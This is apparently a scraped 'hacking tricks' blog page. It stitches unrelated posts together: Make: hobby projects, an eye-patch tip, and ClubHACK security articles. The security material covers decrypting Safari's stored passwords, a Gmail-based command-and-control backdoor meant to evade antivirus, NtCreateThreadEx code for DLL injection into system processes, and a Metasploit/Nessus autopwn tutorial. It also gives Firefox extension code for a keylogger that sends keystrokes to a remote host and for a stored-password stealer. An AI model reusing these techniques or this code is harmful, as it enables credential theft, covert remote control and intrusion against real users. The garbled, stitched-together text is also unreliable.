Facebook tricks, Windows trick, Google trick, Internet hacking, Ethical Hacking, gmail tricks, Technological news, Software Crack, Mobile Tricks, Blogging Trick, ebay Trick, Computer program, LAN hacking, WAN hacking, cookies stealing, Email Tracing
If you’re playing Rocksmith (and I think you should be), and you’re playing standing up (ditto), you have probably run into the “where do I put the controller” problem. The gamepad is required to navigate the menu system between songs, and if you play in a standing position you have to keep a stool or a table nearby to keep it within easy reach.
This simple mod mounts a spring steel clip to the underside of a standard Xbox 360 controller so you can attach it to your guitar strap. In this position, it is easily accessed with your strumming hand.
The steel clip I’m using is a common replacement visor clip for several models of garage door remote. A belt clip fitting, such as Tandy Leather’s 1238-00, should work just as well. The clip is secured to the Xbox battery holder in two ways: first with a short bolt that engages a small hex nut and lockwasher inside the battery holder, and second with a strip of double-sided foam tape that keeps it from rotating about the single bolt.
This mod does not affect normal controller operation in any way. The battery holder can still be removed and the batteries changed normally. In this position, the steel clip is inconspicuous and does not interfere with a normal gameplay grip, nor, significantly, with the controller’s resting attitude on a flat surface.
Make: Projects — Guitar Strap Gamepad
More:
Be the first to like this post.Sean Michael Ragan – Austin, TX
It’s cold and rainy in Austin for SXSW, lines are long inside at registration, and the outdoor tequilla party stages are wet and empty.
The steadfast Make: Live crew has taken the quiet start to test out our livestreaming camera rig (six modem cards! no tin hat!) and to line up interviews for our alt.SXSW coverage.
We’ve already got time planned with Stupid Fun Club, the X Prize Foundation, MakerBot, frogdesign, Second Life founder Philip Rosedale, and more.
If you’re at SXSW and you or your company have hardware, hacks, solutions, or ideas that you want to share with the MAKE audience, hash tag #makesxsw on Twitter or email sabrina@makerfaire.com to set up an interview.
For the fast track, follow #makesxsw on Twitter for updates, observations, and pix. And stay tuned for the weather to clear and the SXSW action to heat up.
I asked Dan Pashman, Editorial Director of AmericansElect.org, to write about how he and his colleagues modified a Rock ‘Em Sock ‘Em Robot set with new heads. Here’s what he wrote:
We wanted to make our own version of Rock ‘Em Sock ‘Em Robots for the Americans Elect lounge at SXSW, so we decided to replace the heads with donkey and elephant heads, to represent the two political parties. This also goes with the giant plush donkey and elephant that people may see in action around SXSW, who are with us. Like the two parties, they just can’t get along.
For this maker’s project, we teamed up with our friends at LBi. Here’s how we did it…
We made rubber molds for the donkey head, donkey ears, elephant head, and elephant ears. We sculpted the heads in clay, then pressed them halfway into a liquid rubber compound. We also made spherical indentations (“keys”) in the mold near the head on one side and a bump on the other, so we’d have something to line up the two halves of the mold. It’s very important that you spray a lot of mold release before you make the second part of the mold.
When you line the two halves of the rubber mold up and press them together, create a hole in the top to pour the liquid plastic in.
We used a two-part plastic mix and added dye. The original plastic mix is yellow, so you have to add a lot of white to get it to blue, but the white pigment makes the plastic softer, so there was a lot of trial and error involved. We went with a yellow plastic mix over clear because yellow is faster drying and we wanted to be able to go through trial and error quickly.
After you’ve poured the liquid plastic into the sandwiched-together mold, put it in a clamp and leave it to dry. When you remove it, drill holes up through the neck to attach to Rock ‘Em Sock ‘Em Robot base, and buff the seams. For the elephant we drilled holes into the sides of the head and stuck the ears in. For the donkey we made the mold so the ears wedge in to the top of the head. In both cases we used plastic glue to attach ears to the heads.
With the donkey head, it was very difficult to get the blue color. We found if you add a lot of pigment it doesn’t bind correctly, and you get different levels of hardness in the plastic, and it’s tough to do it consistently. We ended up making a bunch of them and went with the best looking ones.
The shorts were sewn together on the robots.
Come to the Americans Elect lounge at SXSW, not only for the Flash Mob Happy Hours, but also to play Rock ‘Em Sock ‘Em Robots: Donkey v. Elephant yourself! And tweet a photo or video of our living, breathing donkey and elephant at #donkeyVelephant to win your own version of this limited edition game!
See all the process photos on Flickr.
Editor’s Note: MAKE will be covering SXSW and will are going to try and get to the Rock ‘Em Sock ‘Em Robots: Donkey v. Elephant event to cover here on the site. Stay tuned…
Safari is one of the top 5 browsers known for its innovative look and feel reflected in every product of Apple! It offers one of the best ways to browse online, greater support for HTML5, and other new features that make the web even better experience.
Like other browsers, Safari also comes with built-in ‘password manager’ feature for securely storing and managing the user's web login passwords.
This article is set to expose – in first ever public disclosure - password secrets of Safari including the stored password location, encryption algorithm and code for decryption of stored passwords!
Safari Password Storage Location
Safari features good password manager with better security model and encryption algorithms to keep it as much as secure as possible. Unlike other browsers such as Firefox, Chrome, you cannot see the stored passwords in Safari.
You can enable or disable the Safari password manager by toggling the option through "Settings -> AutoFill -> Usernames & Passwords" (as shown below). Once enabled Safari will prompt to save the password for every website login for the user. Upon confirmation, website URL along with username & password are saved to secret password file.
Safari stores all such web login passwords at a secret file named 'keychain.plist' at following location (based on platform).
[Windows XP] C:\Documents and Settings\\Application Data\Apple Computer\Preferences [Windows Vista & Windows 7] C:\Users\\AppData\Roaming\ Apple Computer\Preferences
Safari stores the contents of 'keychain.plist' in 'Binary Property List' file format - variation of Property List [Reference 1] format used by Apple for storing binary data.
Here is how a typical 'keychain.plist' file looks like,
Decoding the Safari 'Keychain' Secrets!
Looking at above 'keychain file' content, there is hardly anything you can make out. Only hint that you get here is the 'bplist' keyword at the beginning of file.
After long search hours on 'bplist' keyword, I finally figured out the way to decode its content to plain XML file. Apple provides the tool called 'plutil.exe' for playing with these 'Property List' files. You can find this console tool at following location,
[Windows x86] C:\Program Files\Common Files\Apple\Apple Application Support [Windows x64] C:\Program Files (x86)\Common Files\Apple\Apple Application Support
Here is the command to covert cryptic 'keychain.plist' file to easily readable 'keychain.xml' file
This is how it will look like after decoding to XML file.
Internals of Safari Encryption Algorithm
The generated XML file (as shown above) contains encrypted password data along with website URL and user login information. This stored password data is encoded using BASE64 algorithm.
Note that original password data stored in 'keychain.plist' file is not encoded with BASE64. When we convert it to XML using Plutil tool, the encrypted password data is further encoded with BASE64 format.
Once you decode the password using BASE64 you will see original encrypted password data. Safari uses standard 'Windows Data Protection' mechanism (DPAPI) [Reference 2] to encrypt the password data with user isolation layer. Windows DPAPI provides functions like CryptProtectData/CryptUnprotectData for easy encryption/decryption of user oriented sensitive data such as passwords.
Safari uses CryptProtectData [Reference 3] along with static entropy (salt) to securely encrypt all website login passwords. Finally it is stored in the 'keychain.plist' file along with other user login information.
Decoding & Decryption of Safari Password
As mentioned in previous section, successful Safari password recovery will require following 2 steps:- 1. Base64 Decoding of password data from XML file 2. Windows DPAPI decryption of encrypted data
First you have to use standard Base64 decoder algorithm [Reference 5] to get original password data from encoded password bytes in XML file.
After that we have to perform decryption of this encrypted password data. In order to decrypt this encrypted password data we need to figure out salt data used in CryptUnprotectData. Here is the salt data that I found during my reverse engineering work.
Entire salt generation algorithm and decryption functions are within the Apple shared library 'CFNetwork.dll' which is present at following location.
[Windows x86] C:\Program Files\Common Files\Apple\Apple Application Support [Windows x64] C:\Program Files (x86)\Common Files\Apple\Apple Application Support
Here is the disassembly of CFNetwork.dll from IDA Pro Disassembler [Reference 6] showing the location of salt generation & decryption function.
Initially salt generation algorithm appeared to be dynamic but after few reversing session on different systems my doubts cleared and it was just static data. Salt data is of 144 byte size and ends with standard signature pattern as 'com.apple.Safari' as shown in the above screenshot. Once you get hold of the salt data, the encrypted password can easily be decrypted using CryptUnprotectData function [Reference 4] as shown below:
Above program initializes the salt data and then passes it to CryptUnprotectData along with decoded password data to finally get the decrypted data. First 4 bytes of this decrypted data contains length of the password and then follows the password in clear text!
That is all it takes to successfully decrypt the Password from Safari Store!
Recovering Safari Passwords using SafariPasswordDecryptor
SafariPasswordDecryptor [Reference 7] is the FREE software to automatically recover website login passwords stored by Safari web browser. It helps in instantly decoding and decrypting all the stored website login passwords from Safari Keychain file.
It presents both GUI as well as command line interface, the later is more helpful for Penetration testers in their work. Apart from normal users who can use it to recover their lost password, it can come in handy for Forensic folks in their investigation.
SafariPasswordDecryptor works on most of the Windows platforms starting from Windows XP to latest operating system, Windows 7.
References 1. Apple's 'Property List' File format 2. Windows Data Protection Technology – DPAPI 3. CryptProtectData Function 4. CryptUnprotectData Function 5. Base64 Decoder Algorithm – C/C++ Program 6. IDA Pro – Most Popular Disassembler on the Planet 7. SafariPasswordDecryptor - Apple Safari Password Recovery Software
This paper demonstrates unique kind of communication technique between attacker machine and victim machine during the exploitation of any victim system. Usually, while an attacker exploits the remote system and gets the remote command prompt (remote shell), attacker is only able to execute commands till the session from the remote machine is opened (established). While exploiting the system in a normal way, attacker and the victim system both should be online, if attacker wants to execute some commands in remote machine (Victim Machine). This paper would demonstrate how an attacker can attack a remote victim without being online (attacker may or may be online AND victim may or may not be online).
History During the exploitation of vulnerable remote system (victim system) by an attacker, after vulnerability injection, attacker sends payload and gets remote command prompt on his/her (attacker’s) machine. In this case of normal payload, the limitation for an attacker is that, once the session is expired or shell is terminated, attacker can’t execute commands in remote machine (victim computer).This white paper demonstrates new type of payload by using which attacker can execute command in remote machine (victim system) without actually directly connecting to victim machine and also fooling Antivirus, Firewalls etc.
My Method In general scenario, if attacker gets remote command prompt and execute command in the current session then there is direct communication (connection) between attacker and victim machine. But by using this paper’s mechanism we can prevent direct communication (connection) between attacker and victim. For this, we use an intermediate server (zombie) that should be up and running all the time (24x7). In our case, we use this zombie as an email service like Gmail, Yahoo, msn etc. So the whole system works as explained below.
Attacker infects remote system with an Executable, which can be infected by one of the below mentioned methods:
By autorun.infDuring Metasploit ExploitationPhysical access of victim system
Now once Executable is up and running in the remote machine (Victim Machine), when the victim connects to the internet then it first checks the instruction set in Gmail inbox by an attacker. Now let’s say if an attacker wants to execute command ‘ipconfig’ in remote machine (victim machine) then attacker has to send email with subject ‘ipconfig’ to his own email address . Because the username and password is already encrypted in the Executable file in the victim machine (remote machine ), and as victim comes online , that executable file automatically logs in your Gmail account and reads all command instructions which is loaded by attacker.
It executes the commands of attacker’s choice and attaches these results to the attacker’s Gmail account. Attackers simply have to download that attachment which contains command output from victim machine. So there is an email service (Gmail) between attacker and victim machine. That shows, attacker can execute command in victim system but there is no direct connection between attacker and victim machine, and if an attacker uses Tor (The Onion Router Browser) or Anonymizers for accessing the Gmail account then attacker never can be caught (no reverse traces). It is something like Attacker <->email service <->Victim <->. So life cycle will be as shown below:
Attacker <--> Proxy <--> Email Service <--> Victim
(Tor, Anonymizers) (Gmail, Yahoo, etc.) (Proxy Case Scenario)
Hands-on-Approach
Stage I
Let’s say you have infected remote system with this exe and you want account info, drive info and network info from the remote machine (victim machine) then you have to send email to your own account (note: which is also listened and shared by injected exe in remote victim machine) with subject containing account_info, driveinfo, networkinfo as shown in the figure on the next page.
Stage II
Now once the email with appropriate subject is sent to your account, now it’s time for remote machine (victim machine) to be online and fetch the instruction given by intruder (in this approach, “Attacker”). As the victim system comes online, it executes appropriate commands of attacker’s need, redirect command output to .data file and finally automatically attach this file to your email account. Hence, by simply downloading this file you will get all the cmd output in attached .data file as shown in below figure.
Here in the above figure you can clearly see that, all required outputs are attached in your email address!
Advantages
Advantages are that the attacker is never going to be caught if he/she is using the browser like TOR, Anononymizer, VPNs or Any PROXY…. For accessing the attacking Gmail account.No Antivirus can detect the Instruction data because all traffic would come from HTTPS And Antivirus Softwares and Network Intrusion Detection Software Detects simply an outbound connection with GMAIL...!Only a single Gmail account is required. Attacker and victim machine both would be connected to the same account but the attacker knows, and the victim doesn’t!!
Disadvantages Disadvantage is that, if the victim has a habit of checking the current connections using commands like ‘netstat –n’, then there is a possibility to detect Gmail connection when actually there is no browser activity. But still it is difficult to detect because process is running in Hidden mode.
Conclusion So by using above technique, attacker has to send commands as a subject to his/her own email address and then it is fetched and executed in victim machine by executable file running in victim machine. And results of that commands are sent back to the attacker’s email account as an attachment. So there is no need to be online for both attacker and victim. And Anti-viruses and Firewalls going to bypass using this technique because Av and Firewall notice that victim system connects to the Gmail (not actually connects to attacker machine for transferring data) and it uses HTTPS encryption of Gmail for transferring the data (no chance of signature based detection because of HTTPS), so they don’t find any threats for victim machine, so no security alarms!
Remote Thread Execution in System Process using NtCreateThreadEx for Vista & Windows 7 | ClubHACK Magazine Skip to Main Content Area ClubHACKAbout UsTeamPartnersContributorsAuthorsArchives Contact UsSubscribeRSSAdvertise HomeTech GyanLegal GyanTool GyanMom's GuideSpecial FeatureMatriux VibhagPosterDownloadsDownload PDF Home Remote Thread Execution in System Process using NtCreateThreadEx for Vista & Windows 7
Windows provides API function called, CreateRemoteThread Ref 2 which allows any process to execute thread in the context of remote process. This method has been mainly used to inject DLL into remote process, this technique is popularly known as 'DLL Injection'. Especially malware programs exploited this mechanism to evade their detection by injecting their DLL into legitimate processes such as Explorer.exe, Winlogon.exe etc.
Vista & Session Separation
This DLL Injection technique using CreateRemoteThread technique has worked flawlessly till Vista without any limitations. However since Vista onwards things have changed with the introduction of 'Session Separation'Ref 3. This was one of the many defenses introduced in Vista towards securing the system. 'Session Separation' ensured that core system processes including services always run in session 0 while all user process's run in different sessions. As a result any process running in user session failed to inject DLL into system process as CreateRemoteThread did not work across session boundaries.
This is clearly evident from the MSDN documentation of CreateRemoteThread Ref 2 function...
"Terminal Services isolates each terminal session by design. Therefore, CreateRemoteThread fails if the target process is in a different session than the calling process."
About NtCreateThreadEx Function
With the failure of CreateRemoteThread, there was a need for universal solution for remote thread execution on Vista and Windows 7 platform. Then comes the function, NtCreateThreadEx Ref 1, the undocumented function which provides complete solution for executing remote thread across session boundaries. It allows any process to inject DLL into any other process irrespective of the session in which it is running as long as it has sufficient privileges.
Here is the prototype of NtCreateThreadEx function [undocumented]
typedef NTSTATUS (WINAPI *LPFUN_NtCreateThreadEx) ( OUT PHANDLE hThread, IN ACCESS_MASK DesiredAccess, IN LPVOID ObjectAttributes, IN HANDLE ProcessHandle, IN LPTHREAD_START_ROUTINE lpStartAddress, IN LPVOID lpParameter, IN BOOL CreateSuspended, IN ULONG StackZeroBits, IN ULONG SizeOfStackCommit, IN ULONG SizeOfStackReserve, OUT LPVOID lpBytesBuffer);
This function is almost similar to CreateRemoteThread function except the last parameter which takes unknown buffer structure. Here is the definition of that buffer structure parameter...
This information is derived based on reverse engineering work. Hence meanings and importance of internal fields of this buffer structure is not clear.
Executing Remote Thread into System Process using NtCreateThreadEx
FunctionThe steps involved in the execution of the remote thread using NtCreateThreadEx is almost similar to that of CreateRemoteThread function. Hence the traditional steps such as allocating memory, copying the thread code into remote process are not repeated here. For detailed steps you can refer to article, "Three Ways to Inject Your Code into Another Process" Ref 4.
Before we begin, we need to load NtCreateThreadEx function from Ntdll.dll as shown below.
HMODULE modNtDll = GetModuleHandle("ntdll.dll"); if( !modNtDll ){ printf("\n failed to get module handle for ntdll.dll, Error=0x%.8x", GetLastError()); return;}LPFUN_NtCreateThreadEx funNtCreateThreadEx = (LPFUN_NtCreateThreadEx) GetProcAddress(modNtDll, "NtCreateThreadEx");if( !funNtCreateThreadEx ){ printf("\n failed to get funtion address from ntdll.dll, Error=0x%.8x", GetLastError()); return;}
Now setup the buffer structure which is passed as last parameter to NtCreateThreadEx function.
Finally execute remote thread 'pRemoteFunction' into remote process using NtCreateThreadEx function. Here one can use 'LoadLibrary' function address instead of 'pRemoteFunction' thread to implement 'DLL Injection' technique.
NTSTATUS status = funNtCreateThreadEx( &hThread, 0x1FFFFF, NULL, hProcess, (LPTHREAD_START_ROUTINE) pRemoteParameter, pRemoteParameter, FALSE, //start instantly NULL, NULL, NULL, &ntbuffer);Now check for the result of NtCreateThreadEx function and then wait for it to execute completely. if (hThread == NULL){ printf("\n NtCreateThreadEx failed, Error=0x%.8x", GetLastError()); return;}//Wait for thread to complete....WaitForSingleObject(hThread, INFINITE);
Finally retrieve the return value from the remote thread function, 'pRemoteFunction' to verify the result of function execution.
//Check the return code from remote thread function int dwExitCode;if( GetExitCodeThread(hThread, (DWORD*) &dwExitCode) ){ printf("\n Remote thread returned with status = %d", dwExitCode);} CloseHandle(hThread);
The steps illustrated above are almost similar except that here NtCreateThreadEx is used instead of CreateRemoteThread for creating thread in the context of remote process
Limitations of NtCreateThreadEx Method
Though NtCreateThreadEx provides universal solution on Vista/Win 7 platform for remote thread execution, it is risky to use in the production code as it is an undocumented function. As things may change with new version and suppor packs, enough testing is necessary before putting it into production especially when injecting code into system critical process such as LSASS.EXE, CSRSS.EXE.
Another limitation is that it cannot be used in earlier platforms before Vista, such as Windows XP because NtCreateThreadEx function is available only Vista onwards. However developers can easily tune their code to dynamically use CreateRemoteThread function on XP and NtCreateThreadEx for Vista/Windows 7.
Alternative Techniques
Another way to inject DLL into system process is to write the service process (which will run in session 0) and then issue the command from user process to that service to inject DLL into any system process using the CreateRemoteThread function.
This technique will work for any system process running in session 0. But it will fail to execute thread into any other process running in session other than 0.
Though it is a clumsy way of doing the work, it still holds good solution to inject thread into system process only.
Conclusion
This article provides practical implementation of using NtCreateThreadEx function to execute remote thread into any process on Vista/Windows 7 platform. Though it is undocumented function, it provides universal solution for executing code in any process across session boundaries imposed by Vista/Windows 7.
ReferencesNtCreateThreadEx FunctionMSDN Documentation of CreateRemoteThread FunctionImpact of Session 0 Isolation on ServicesThree ways to inject code into remote processAbout The AuthorNagareshwar is a security professional with the unbeaten passion towards Computer Security, mainly involved in Reverse Engineering, Security Research and developing Security Tools. He holds engineering degree in Computer Science from National Institute of Technology of Karnataka, Surathkal (KREC), India. He has professional experience of around 6+ years spanning across Novell & Citrix where he has worked on security and application virtualization technologies.
Microsoft VistaMicrosoft WindowstechGyanTerminal ServicesWindows 7 Add new comment Author CHMag Collector's Edition Vol II
If you know you're going to be moving from a well-lit area to the dark, you can cover one of your eyes—like a pirate with an eye patch—for a few minutes beforehand to see better in the dark.
It's long been speculated that pirates and sailors would wear eye patches so they could see better below deck. They'd keep the eye patch on in the light, then when they went into the dark, they switched the eye patch over to the other eye. The one that had been under the eye patch for awhile would be well adjusted to the dark and they'd be able to see much better.
You can use this trick in your daily life, if you know you need to enter a dark area (say, a basement with no lights in it). Just cover up one of your eyes for a few minutes beforehand (or throw on an eye patch, if you're feeling rather piratey) and head down into the dark. If you open your eye and close the other one, you should be able to see better. This tip's been floating around the internet for awhile (not to mention it was mentioned on Mythbusters), but after a reminder from Redditor VerticalZero, we thought it was worth featuring. Hit the link to see more.
Using Metasploit with Nessus Bridge on Ubuntu | ClubHACK Magazine Skip to Main Content Area ClubHACKAbout UsTeamPartnersContributorsAuthorsArchives Contact UsSubscribeRSSAdvertise HomeTech GyanLegal GyanTool GyanMom's GuideSpecial FeatureMatriux VibhagPosterDownloadsDownload PDF Home Using Metasploit with Nessus Bridge on Ubuntu Ever wondered how to use the autopwn feature in Metasploit on Ubuntu? Want to run nessus from within metasploit? What database should I use; sqlite3 or postgres? I will explain the benefits of both. The concept will allow you to do various tasks with your nessus server and nmap from within the msf command line. Nessus is a vulnerability scanner program, it is free for personal use using the home home. They also have a nessus for business which requires a fee. I will be discussing the nessus for home use and using it with the popular metasploit framework. Acquire the latest release of nessus homefeed Nessus-4.4.1-ubuntu1010_i386.deb and register for the activation code. Follow the instructions listed in the document ion for installing with Ubuntu and start to configure. Nessus daemon cant be started until nessus has been registered and the plugin (http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code) download has occurred. $ sudo /opt/nessus/bin/nessus-fetch –register 'registration code from nessus' Add user:- $ sudo /opt/nessus/sbin/nessus-adduser Make cert:- $ sudo /opt/nessus/sbin/nessus-mkcert
Start the nessus Daemon:- $ sudo /etc/init.d/nessusd start Open up web browser to https://localhost:8834, login and complete a policy for your scans. I would create a number of policies based on the different systems that you will be scanning. If your scanning a windows environment then having the plugin for Linux and BSD are pointless. Also make sure that you have safe checks enabled, select a port scanner to use, select credentials, select plugins (remember not to enable ones that will bounce the box), and select preferences. When finished you should have a number of different policies that will be numbered 1 – however many you have and you can give them names for example for scanning windows environment you can label them as windows. Now you can logout of nessus and close the web browser. Now open up a terminal and browse to where metasploit is installed and run an update. $ cd /opt/framework-3.6.0/msf3 $ sudo svn update Before we start the msfconsole lets get our database in proper order. Now I have used sqlite3 in the past and even did a tutorial on my website using sqlite3 http://pbnetworks.net/?cmd=bbs&id=35 which worked fine but sometimes it may not work and give error warning 'Note that sqlite is not supported due to numerous issues. It may work, but don't count on it.' Postgres is the recommended database for Metasploit. So let?s install the postgres database and libraries. $ sudo apt-get install postgresql-8.4 $ sudo apt-get install rubygems libpq-dev $ sudo gem install pg $ sudo apt-get install libreadline-dev $ sudo apt-get install libssl-dev $ sudo apt-get install libpq5 $ sudo apt-get install ruby-dev Now every time you start your system start the database before you start metasploit $ sudo /etc/init.d/postgresql-8.4 start
You will need to become the system postgres user:- $ sudo -s # su postgres Now you will need to create a database user: $ createuser -P Enter password for new role:Enter it again:Shall the new role be a superuser? (y/n) nShall the new role be allowed to create databases? (y/n) nshall the new role be allowed to create more new roles? (y/n) nNext we need to crate a database: $ createdb –owner= msf_database Now we can start up metasploit: :/opt/framework-3.6.0/msf3$ sudo ./msfconsole Enter in the following commands: msf> db_driver postgresql msf> db_connect :@127.0.0.1:5432/msf_database msf> db_hosts
Now before, when using sqlite3, creating and connecting to the database was easy. I would start up metasploit and issue the following commands: msf> db_driver sqlite3 msf> db_connect To verify if the database was connected I would issue the following command: msf> db_hosts If everything looked good I would have no errors and I could use the db_nmap command. But sometimes I would encounter errors and it would crash. Using postgres is more reliable than sqlite3 and it is also useful as I will describe later. Finally go ahead and enable the database on startup by issuing the following commands: msf> cat > ~/.msf3/msfconsole.rc db_driver postgresql db_connect :@127.0.0.1:5432/msf_database db_workspace -a MyProject ^D Now the next time you fire up metasploit your database will automatically be up and you will be connected to it. Just make sure that you have postgres running, I run postgres manually before I start metasploit (See Figure #1). Figure 1: Notice that postgresql loads when first starting the msfconsole Now that we have postgres as the database for metasploit lets start using nessus from within metasploit. Open up a second terminal and make sure nessus is running if not load the daemon. Now from the msfconsole load nessus (see figure #2). msf > load nessus Figure 2: Loading nessus from the msfconsole Now let see what kind of commands the Nessus Bridge for Metasploit 1.1 has given us, type nessus_help (see figure #3). msf > nessus_help Figure 3: Nessus Help The commands are divided up into different sections labeled Generic, Reports, Scan, Plugin, User, and Policy commands. Before we can run a scan we need to connect to the nessus server by using the nessus_connect command. msf > nessus_connect :@localhost:8834 ok This should connect and authenticate you. From here you can run the scans, review the results, and load the scan results into the database and use autopwn feature. Or you can view the results and find a vulnerability with a system you scanned and throw a single exploit and get a meterpreter shell. Depending on the environment you may want to review the results of your nessus output and find the appropriate exploit to use instead of generating the noise of running autopwn. Now let?s start our scan by issuing nessus_scan_new command as follows nessus_scan_new (this was set in your nessus policy settings) (generic) (ip address) msf > nessus_scan_new 1 winXP_home 192.168.1.124 To check up on the status of our scan use the nessus scan status feature (see figure #4). msf > nessus_scan_status Figure 4: Nessus Scan Status When the scan has completed you can view the results using the following commands msf > nessus_report_list We can view a list of hosts from the report with the following command msf > nessus_report_hosts UID To view further information issue the following command:-msf > nessus_report_host_ports UID (see Figure #5) Figure 5: nessus_report_host_ports 192.168.1.124 UID To see a list of hosts issue the db_host command. If you want to remove hosts from the db_hosts file then issue thedb_del_host command (see Figure #6) Figure 6: db_del_host command Next we need to load the results into our database with the following command msf> nessus_report_get UID Now with the scan complete and the host listed in the db_hosts file you can run the autopwn tool or find an exploit that will work against the box. More on this in another article next month. Now lets take a look at using nmap within the metasploit framework. To use the nmap command from within the metasploit framework use the 'db_nmap' command to run nmap scans against targets and have the scan results stored in the database. When running on Back|Track I can issue many different nmap commands such as db_nmap -sS -sV -T 3 -P0 -O -D RND --packet-trace. Which show the results: -sS TCP SYN stealth scan, -sV version scan, -T 3 normal scan, -O find the operating system, -D RND use a decoy and generate a random, non-reserved IP address, and finally --packet-trace will trace packets and data sent and received. I like to use the packet-trace feature on large scans because if it fails you can see it. Now this is great feature to use while in the msfconsole but I can?t do this when using Unbuntu and connected to the postgres database as the postgres user. Why? Because I get an error saying that only the root user has the ability to use this nmap option (see Figure #7). I can use 'db_nmap -v -sV 192.168.15.0/24 --packet-trace' and the scan runs and produces an output. I have view the results with the following commands (Figure 8) msf > db_hosts msf > db_services -c port,state Figure 7: nmap error with postgres Now if I want to issue complex nmap scans I can exit out of the msf prompt, exit out of postgres, stop the database and login with sudo and use the sqlite3 database. The same command that the OS didn't allow me to use now can be used with no problem (Figure #9) Figure 8: db_namp using postgres database Figure 9: db_nmap using sqlite3 msf > db_nmap -sS -sV -T 4 -P0 -O 192.168.15.0/24 -D RND --packet-trace Look at the difference in results we now have after viewing information in the db_hosts and db_services -c port,state commands. Compare difference between figure #10 & figure #8. Figure 10: nmap results showing sqlite3 ConclusionThis information can be useful in checking the integrity and strength of your network if you are the Network Security Engineer for your workplace, and have permission to do so. Doing this to networks that you have no authorization to be on is against the law in many if not all countries. For more information and some video tutorial please visit my website at http://pbnetworks.net On the 'NetLink to postgres setup: http://dev.metasploit.com/redmine/projects/framework/wiki/Postgres_setupLink to video tutorials: http://pbnetworks.net/?cmd=bbs
dave@pbnetworks.net
David J. Dodd
David J. Dodd is currently in the United States and holds a current 'Secret' DoD Clearance. A former U.S. Marine with Avionics background in Electronic Countermeasures Systems. David has given talks at the San Diego Regional Security Conference He works for pbnetworks Inc. http://pbnetworks.net a small service disabled veteran owned business located in San Diego, CA
BSDContact DetailsDavid J. DoddDriverLinuxPerson Email AddresstechGyanTechnologyUbuntu Add new comment Author dave@pbnetworks.net CHMag Collector's Edition Vol II
This paper aims to detail some of the techniques and methods that exist to subvert a fully patched and functioning browser Firefox. This aims to provide insight to developers and end users on some methodologies which could be used by malicious users. We will understand some of the basic important components that make up the Mozilla platform and various attacks that can be targeted against it. Firefox is a trusted browsing platform used by millions across the globe. It is a platform that is used by experts and novices. One of the biggest advantages and reason for massive success of Mozilla is an extensible plug-in model which allows the developers add additional features to the Mozilla Firefox environment than what was perceived by the original writers. Our topic of discussion is focused around these extension modules and how a malicious
developer can use some of these powerful features to subvert a Firefox and the underlying systems. The Code of extension runs with the same privilege that the browser enjoys.
Let’s begin with a very brief idea of some of the important components that make a Firefox extension. * This is for ff3.6 and not yet tested with ff4.
Chrome Chrome is used to indicate a special trust zone within Firefox; Firefox extensions that run in this zone enjoy a whole lot of trust by the browser. Chrome resources are defined by use of a special URL scheme “chrome: //” Example: chrome://messenger/content/messenger.xul
XUL XUL (XML User Interface Language) is Mozilla's XML-based language that lets you build feature-rich cross platform applications that can run connected or disconnected from the Internet. XUL overlays are a way of extending the user interface and behavior. For example is the new menu item or a button on status bar.
XBL XBL (XML Binding Language) allows the definition of new XML nodes/elements or custom tags. Custom tags can inherit processing logic. The connection between the new tag and the processing logic is called a binding. The object logic can be written to take advantage of any of the services available to the platform, including all the XPCOM objects and other custom tags that possess their own bindings. XML content and XPCOM can be tied together via an XBL binding. The “tabbed navigation” in Firefox is an example of XBL.
XPCOM XPCOM is the lowest layer of the Mozilla platform architecture. XPCOM provides functionality and its extensions. XPCOM interfaces are used by the browser and extensions to provide multiple functionalities to the user. XPCOM components can be built in many programming languages some are C++, Python, and Java. XPconnect is the JavaScript interface to XPCOM objects. Extensions can create new components after installation.
Each one of these components can be used by malicious user for his gains.
The Full Mozilla Components Map
Extensions Installation Firefox extension which is commonly known with an extension of “XPI” is nothing but a Zipped Archive. This means a user can use any unzip solution like “winzip” to effectively examine the contents of an extension.
Extensions can be downloaded from “https://addons.mozilla.org/en-US/firefox/”. There exists a peer review of extensions performed before Mozilla places the extension on its site. But the point of concern is that security testing is not of utmost importance for testers. The second issue that has surfaced is the possibility of extensions which are hosted at Mozilla but without code review.These are mostly experimental in nature. The sheer number of extensions is overwhelming.Today the number of extensions has crossed more than 2 billion and growing.
XPI file can be hosted on any website and can be downloaded and installed on the target system. Any malicious user with some social engineering experience can easily convince a user to use his XPI. The other aspect I would like to bring to notice is the fact that many organizations seem to offer extensions like a DLP solutions company offering an extension to scan outgoing data via Firefox extensions. The question then remains as to who performs analysis of these extensions.
The third method of installation is in the way Mozilla provides a method where a filename with id of the extension and the contents of the file stores the location were the extension files are stored this file has to be stored in the extensions folder of Mozilla which is typically in program-files folder or the Mozilla directory in the profiles directory. When Mozilla restarts it automatically installs the extension no questions asked.
A startling find that I made when working with Mozilla extensions is that the extension executable scripts could be stored on a remote machine in a share.
By default Mozilla does not allow files to be loaded from network but if it is a mapped drive then Mozilla treats it like a local disk and goes ahead and installs the extension. This functionality can be abused. Worst case scenario I could imagine is attacks by a malicious USB injecting a simple text file into a victim machine and the text file pointing to a malicious code on a remote zip drive. This same activity could be performed by a malicious Active directory administrator owing browser rights across the enterprise.
Though a code review is performed by Mozilla before getting the add-ons published on their site, some of the concerns that exist are
The add-on is not signed as of today.The sheer number of add-on is overwhelming.The ease of making an add-on could add to the problem.The availability of experimental add-ons and extension that have not gone through the review process.Future upgrades to an add-on could add some malicious content.
Extensions are everywhere
Attacking Firefox In the second part of this paper we will focus on attacking Firefox in this section we will discuss how easy it is to build malicious extensions and then go on to discuss cross context switching(xcs).
Malicious Extensions To keep this paper short I will discuss
How to build a Key logger with XMLHTTP and event listenerHow to build an extension that writes a malicious site to “No-Script” white list.How to build an extension that steals stored passwords.
Key Logger We can create a simple key logger by just using event listener which will record all keystrokes and then use XMLHTTP request to a remote site. The point to note here is that extensions don’t follow single origin policy thus an extension that records a password from your banking site can send it to a malicious site. Code:- document.addEventListener("keypress", onkey,false); var keys=''; function onkey(e){ keyss+=String.fromCharCode(e.charCode); if (keys.length>20){ http=new XMLHttpRequest(); url = "http://***********.com/prasannak/ler****.php?keylog="+keyss+"\n"; http.open("GET",url,false); http.send(null); keyss='';
No-Script Bypass We will use XPCOM classes and components to add a malicious site to no-script white list which will effectively render no-script protection useless?
Password Stealer We will use XPCOM classes and components to build a Firefox stored password stealer.Code:-
let HelloWorld = { onCommand: function(event) { var l2m = Components.classes["@mozilla.org/login-manager;1"]. getService(Components.interfaces.nsILoginManager); alltheinfo = l2m.getAllLogins({}); for (i=0; I<=alltheinfo.length;i=i+1){ alert(alltheinfo[i].password) } } };
